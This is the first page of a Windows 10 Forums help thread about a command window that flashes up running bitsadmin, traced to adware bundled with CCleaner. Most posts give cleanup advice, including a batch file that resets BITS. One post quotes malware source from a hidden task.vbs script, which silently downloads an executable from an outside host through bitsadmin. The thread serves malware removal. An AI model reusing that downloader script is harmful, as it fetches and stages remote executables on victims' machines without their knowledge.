Page 1 of 3 123 LastLast

  1. Join Date : Nov 2016
    Posts : 6
    Windows 10
       2 Weeks Ago #1

    Bitsadmin pops up randomly and immediatly disappears (take 2?)


    I hate to start naming people off here like an assembly line, but I find myself in the same situation as @tkrisz0403 in that my Command Prompt, accompanied by the exact same text as the former case, as seen in the first screen shot I provide which I managed to capture using OBS studio (please feel free to snoop through my dungeons and dragons writing at your leisure . I proceeded to follow some of the advice provide by @Hydranix and @Superfly by proceeding to download the bitsadmin buster.zip, which did promptly catch and freeze the process. The txt it provided was also identical, "Parent Process Name: cmd.exe" (of which I'll also produce a screenshot, mainly because I'm not knowledgeable enough to do anything else in a forum)

    I then went on with further with the instructions in that particular forum, first entering "Get-BitsTransfer -AllUsers | select -ExpandProperty FileList | Select -ExpandProperty RemoteName" into powershell as recommended by @Superfly, which gave me slightly different results. Still, cloudfront.net appeared to be the issue, as it came up in an almost identical fashion as in @tkrisz0403 's case. I proceeded to enter the command prompt provided by @Superfly;

    "@echo off
    net stop BITS
    ipconfig /flushdns
    del "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr0.dat"
    del "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr1.dat"
    net start BITS

    net stop wuauserv
    net start wuauserv"

    It was at this point the results appeared different enough that I, not being an expert in this field, didn't want to go any further, the results of which again being posted in a screen shot. I've downloaded ADWcleaner, which was the next recommended step to check for the possibility of malware, which I firmly believe it is, but have ceased to move forward until some fine chap comes along and tells me "Aw, you adorable little monkey, here, do this," and out of the kindness of their hearts decides to guide me through this process. I hope to hear from anyone and everyone soon, and I drink to your health and good fortune. Cheers ... (Hm, that emoji doesn't quite do me justice. I'm not a drunk, I'm just Irish, I swear.)

    P.S. As an additional update, while typing this, I do believe I did see the command prompt pop up again, though I wasn't thoroughly paying attention and cannot be certian. Could be paranoia. Could the buster ceased to work after a time. I'm not sure. As an additional precaution, I'm posing yet another screen of the command prompt that stayed after downloading and executing the bitsadmin buster.exe, though it is and has been completely blank. If there is any other information I can provide, I won't hesitate to do so.
    Attached Thumbnails Attached Thumbnails Screenshot (2).png   Screenshot (3).png   Screenshot (4).png   Screenshot (5).png   Screenshot (6).png  

      My System SpecsSystem Spec


  2. Join Date : Oct 2014
    Posts : 1,301
    W10 Pro + W10 Preview
       2 Weeks Ago #2

    Its a Google toolbar usually bundled with Ccleaner....a snooper, potentially unsafe.
    To eradicate in Safe Mode...Hitman Pro or ADWcleaner.
      My System SpecsSystem Spec

  3.    2 Weeks Ago #3

    Just a quick fyi for CCleaner users (like me): one week after a new edition hits their CCleaner builds page, they post a "slim" version of the program that has no bundleware in it at all. If you're willing to wait, you can skip that extra add-in altogether.
    Click image for larger version. 

Name:	ccblds.jpg 
Views:	23 
Size:	20.9 KB 
ID:	110280
    For example, ccsetup524.exe showed up on the site on Monday, Nov 14, I believe. That means ccsetup524-slim.exe should show up on 11/21. I'll wait to download and install that one, instead of the "Standard installer" version.
    HTH,
    --Ed--
      My System SpecsSystem Spec


  4. Join Date : Oct 2014
    Posts : 1,301
    W10 Pro + W10 Preview
       2 Weeks Ago #4

    Thanks for tip Ed....a bit naughty in the first place CCleaner not notifying installed bundleware came with the package.
      My System SpecsSystem Spec

  5.    2 Weeks Ago #5

    I doubt CCleaner is to blame (other than for the adware)... but anyway, the problem I think relates to a script called task.vbs.

    See here for removal instructions.
      My System SpecsSystem Spec


  6. Join Date : Oct 2014
    Posts : 1,301
    W10 Pro + W10 Preview
       2 Weeks Ago #6

    Superfly said: View Post
    I doubt CCleaner is to blame (other than for the adware)... but anyway, the problem I think relates to a script called task.vbs.

    See here for removal instructions.
    Confirmation of what was installed with CCleaner.....note the name change from your posted link but unmistakable connection.
    Attached Thumbnails Attached Thumbnails tasks.PNG  
      My System SpecsSystem Spec

  7.    2 Weeks Ago #7

    OK, thanx for checking that out - what we need to do now, is find that script and see what it calls via bitsadmin.

    PS: Assuming we are on the right path with this....

    The task.vbs apparently contains this:

    Code:
    Set WshShell = CreateObject("WScript.Shell")
    
    cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high http://www.nice-doggy.xyz/run/Updater.exe C:\Users\Tejas\AppData\Local\Temp\amiupdater912.exe",0,False)
    
    WScript.Sleep 300000
    
    cmds=WshShell.RUN("bitsadmin /cancel amijob",0,False)
    
    Set WshShell = Nothing
    It creates a bits job called "amijob" then downloads an updater exe to the temp folder. Waits a set period (I guess for the download to complete), it then cancels the bitsjob. Assuming another task then runs the updater from temp.

    Info: Malware scan of task.vbs 04f5d27e461b2ff0da24b6a367b81d6d4d3c817d - Reason Core Security Labs
    Last edited by Superfly; 2 Weeks Ago at 13:57.
      My System SpecsSystem Spec


  8. Join Date : Oct 2014
    Posts : 1,301
    W10 Pro + W10 Preview
       2 Weeks Ago #8

    Quite a lot on my machine.....red markings my name.....how to differentiate between M$ and any intruder?...I am confident this my Surface Pro 4 is clean as I have it Bitlocker encrypted.
    Attached Thumbnails Attached Thumbnails bits.PNG  
      My System SpecsSystem Spec

  9.    2 Weeks Ago #9

    Those are fine - they are just the executable and dependencies in the components folder... it's the hidden scripts that call it, that's the problem.
      My System SpecsSystem Spec


  10. Join Date : Jul 2015
    Posts : 2,595
    10 Pro
       2 Weeks Ago #10

    dencal said: View Post
    I am confident this my Surface Pro 4 is clean as I have it Bitlocker encrypted.
    A bit off topic this but bitlocker will not do anything to stop you getting infected. Whether you have it turned on or not is transparent to programs running on your PC. It is to stop people getting information off your disk if you leave your laptop in a taxi or whatever.
      My System SpecsSystem Spec


 
Page 1 of 3 123 LastLast


Similar Threads
Thread Forum
Bitsadmin pops up for just a second and vanishes.
I manged to get a screenshot of it. http://prntscr.com/bhep02 I have gone through and read one thread that looks as if I am having the exact problem as them, but I did not want to go off of someone else's problems even though they are very...
AntiVirus, Firewalls and System Security
Solved Bitsadmin pops up randomly and immediately disappears.
Bitsadmin window pops up in every hour/50 minutes and immediately disappear which is very annoying. I've run KasperskyTotal Security and Malwarebytes but they have not found the problem. I made a screenshot from the problem. Any help would be...
AntiVirus, Firewalls and System Security
Bitsadmin pops up randomly and immediately disappears.
During the day a cmd window will pop up and immediately disappear without warning, kicking me out of fullscreen applications and being a general annoyance. I suspect something more sinister but Windows Defender, Malwarebytes and SuperAntiSpyware...
AntiVirus, Firewalls and System Security
Bottom taskbar disappears randomly after using external monitor
Hi there connecting a bog standard laptop (display res 768 X 1366) to a second monitor and setting that as the primary display (HD 1920 X 1080) the bottom taskbar randomly disappears or becomes non functional. The strange thing is that if I...
General Support
Solved Pops and clicks when using MPC-HC
Please delete
Software and Apps
Our Sites
Site Links
About Us
Windows 10 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 10" and related materials are trademarks of Microsoft Corp.

Designer Media Ltd

All times are GMT -5. The time now is 13:39.
Find Us
Twitter Facebook Google+



Windows 10 Forums